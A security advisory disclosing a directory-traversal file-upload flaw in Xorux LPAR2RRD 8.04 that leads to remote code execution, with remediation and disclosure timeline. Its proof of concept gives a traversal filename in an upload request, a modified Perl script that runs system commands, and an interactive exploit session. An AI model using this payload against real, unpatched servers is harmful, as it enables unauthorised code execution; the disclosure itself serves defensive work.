📄 Xorux LPAR2RRD 8.04 File Upload / Directory Traversal

KL-001-2025-016: Xorux LPAR2RRD File Upload Directory Traversal
    
    Title: Xorux LPAR2RRD File Upload Directory Traversal
    Advisory ID: KL-001-2025-016
    Publication Date: 2025-07-28
    Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-016.txt
    
    
    1. Vulnerability Details
    
         Affected Vendor: Xorux
         Affected Product: LPAR2RRD
         Affected Version: 8.04 and prior
         Platform: Rocky Linux 8.10
         CWE Classification: CWE-24: Path Traversal: '../filedir',
                             CWE-434: Unrestricted Upload of File with
                             Dangerous Type, CWE-648: Incorrect Use of
                             Privileged APIs
         CVE ID: CVE-2025-54769
    
    
    2. Vulnerability Description
    
         An authenticated, read-only user can upload a file and perform
         a directory traversal to have the uploaded file placed in a
         location of their choosing.  This can be used to overwrite
         existing PERL modules within the application to achieve remote
         code execution (RCE) by an attacker.
    
    
    3. Technical Description
    
         The filename can be altered manually to direct on the local
         filesystem on the Xormon Original appliance the upgrade file
         should be placed. The Xormon appliance will recognize the
         file as not being a valid upgrade package, but still writes
         the file to the filesystem. This can be exploited to write
         a valid PERL script into the /home/lpar2rrd/lpar2rrd/bin/
         directory, where it can be called by existing scripts that
         are accessible via https://<IP>/lpar2rrd-cgi/<script> URL.
    
    
    4. Mitigation and Remediation Recommendation
    
         Xorux released version 8.05, which includes a remediation
         for this vulnerability. See https://lpar2rrd.com/note800.php.
    
    
    5. Credit
    
         This vulnerability was discovered by Jim Becher of KoreLogic,
         Inc.
    
    
    6. Disclosure Timeline
    
         2025-07-17 : KoreLogic requests point-of-contact to securely
                      report several vulnerabilities to Xorux.
         2025-07-18 : Vendor provides [email protected] as the
                      point-of-contact, noting that they do not use PGP.
         2025-07-21 : KoreLogic submits this vulnerability and four
                      additional discoveries to Xorux.
         2025-07-23 : Vendor acknowledges receipt, stating that the issue
                      has been remediated and a new version of the
                      affected product will be available 2025-07-25.
         2025-07-25 : Xorux publishes updated version of the affected
                      product.
         2025-07-28 : KoreLogic public disclosure.
    
    
    7. Proof of Concept
    
         A simple proof of concept is to alter the users.pl script and
         add some additional logic which will perform the id command. The
         POST is performed using a read-only user, authenticated via
         Basic Auth.
    
    
             POST /lpar2rrd-cgi/upgrade.sh HTTP/1.1
             Host: 172.31.255.207
             Cookie: browserTZ=America%2FChicago
             User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
             Accept: */*
             Accept-Language: en-US,en;q=0.5
             Accept-Encoding: gzip, deflate, br
             X-Requested-With: XMLHttpRequest
             Content-Type: multipart/form-data; boundary=----geckoformboundaryc85a7a0a8e67e32643575b13f47b175f
             Content-Length: 15057
             Origin: https://172.31.255.207
             Authorization: Basic amJlY2hlcjpqYmVjaGVy
             Referer: https://172.31.255.207/lpar2rrd/index.html?amenu=upgrade&tab=0
             Sec-Fetch-Dest: empty
             Sec-Fetch-Mode: cors
             Sec-Fetch-Site: same-origin
             Priority: u=0
             Te: trailers
             Connection: keep-alive
    
             ------geckoformboundaryc85a7a0a8e67e32643575b13f47b175f
             Content-Disposition: form-data; name="upgfile"; filename="../home/lpar2rrd/lpar2rrd/bin/users.pl"
             Content-Type: application/x-perl
    
             use strict;
             use warnings;
             use CGI::Carp qw(fatalsToBrowser);
             use Data::Dumper;
             ...
             [SNIPPED for brevity]
             # Kore
             elsif ( $PAR{cmd} eq "kore" ) {
               my $out;
               print "Content-type: text/html\n\n";
               $out = system("/usr/bin/id");
               print $out;
    
             }
             ...
             [SNIPPED for brevity]
    
         The response from the Xormon Original appliance is:
    
             HTTP/1.1 200 OK
             Date: Thu, 03 Apr 2025 00:37:18 GMT
             Server: Apache
             X-Frame-Options: SAMEORIGIN
             Keep-Alive: timeout=5, max=100
             Connection: Keep-Alive
             Content-Type: application/json
             Content-Length: 93
    
             { "success": false, "message" : "This file doesn't look like the upgrade package", "log": ""}
    
         But the file is still written to the filesystem. Subsequent
         calls to the https://<ip>/lpar2rrd-cgi/users.sh script with the
         cmd added return the output of the id command, as show below.
    
             GET /lpar2rrd-cgi/users.sh?cmd=kore HTTP/1.1
             Host: 172.31.255.207
             Cookie: browserTZ=America%2FChicago
             User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
             Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
             Accept-Language: en-US,en;q=0.5
             Accept-Encoding: gzip, deflate, br
             Authorization: Basic amJlY2hlcjpqYmVjaGVy
             Upgrade-Insecure-Requests: 1
             Sec-Fetch-Dest: document
             Sec-Fetch-Mode: navigate
             Sec-Fetch-Site: none
             Sec-Fetch-User: ?1
             Priority: u=0, i
             Pragma: no-cache
             Cache-Control: no-cache
             Te: trailers
             Connection: keep-alive
    
    
             HTTP/1.1 200 OK
             Date: Thu, 03 Apr 2025 00:37:42 GMT
             Server: Apache
             X-Frame-Options: SAMEORIGIN
             Keep-Alive: timeout=5, max=100
             Connection: Keep-Alive
             Content-Type: text/html; charset=UTF-8
             Content-Length: 61
    
             uid=1005(lpar2rrd) gid=1005(lpar2rrd) groups=1005(lpar2rrd)
             0
    
         This can be expanded upon to create a full-fledged exploit.
    
             attacker $ python3 xormon-orig-readonly-rce.py
             >id
             uid=1005(lpar2rrd) gid=1005(lpar2rrd) groups=1005(lpar2rrd)
             0
             >netstat -an | grep LIST | head -10
             tcp        0      0 0.0.0.0:111 0.0.0.0:*               LISTEN
             tcp        0      0 0.0.0.0:22 0.0.0.0:*               LISTEN
             tcp        0      0 127.0.0.1:25 0.0.0.0:*               LISTEN
             tcp        0      0 0.0.0.0:8162 0.0.0.0:*               LISTEN
             tcp6       0      0 :::111 :::*                    LISTEN
             tcp6       0      0 :::80 :::*                    LISTEN
             tcp6       0      0 :::22 :::*                    LISTEN
             tcp6       0      0 ::1:25 :::*                    LISTEN
             tcp6       0      0 :::8443 :::*                    LISTEN
             tcp6       0      0 127.0.0.1:39931 :::*                    LISTEN
             0
             >ps -efww | grep "java"
             lpar2rrd     934       1  0 Apr02 ?        01:24:22 /usr/bin/java -Xms512M -Xmx1024M -server -XX:+UseG1GC 
    -Dh2.bindAddress=127.0.0.1 -jar /opt/xorux/xormon/xormon.war
             lpar2rrd 1730823 1730810  0 12:14 ?        00:00:00 sh -c ps -efww | grep "java"
             lpar2rrd 1730825 1730823  0 12:14 ?        00:00:00 grep java
             0
             >quit
             attacker $
    
    
    The contents of this advisory are copyright(c) 2025
    KoreLogic, Inc. and are licensed under a Creative Commons
    Attribution Share-Alike 4.0 (United States) License:
    http://creativecommons.org/licenses/by-sa/4.0/
    
    KoreLogic, Inc. is a founder-owned and operated company with a
    proven track record of providing security services to entities
    ranging from Fortune 500 to small and mid-sized companies. We
    are a highly skilled team of senior security consultants doing
    by-hand security assessments for the most important networks in
    the U.S. and around the world. We are also developers of various
    tools and resources aimed at helping the security community.
    https://www.korelogic.com/about-korelogic.html
    
    Our public vulnerability disclosure policy is available at:
    https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy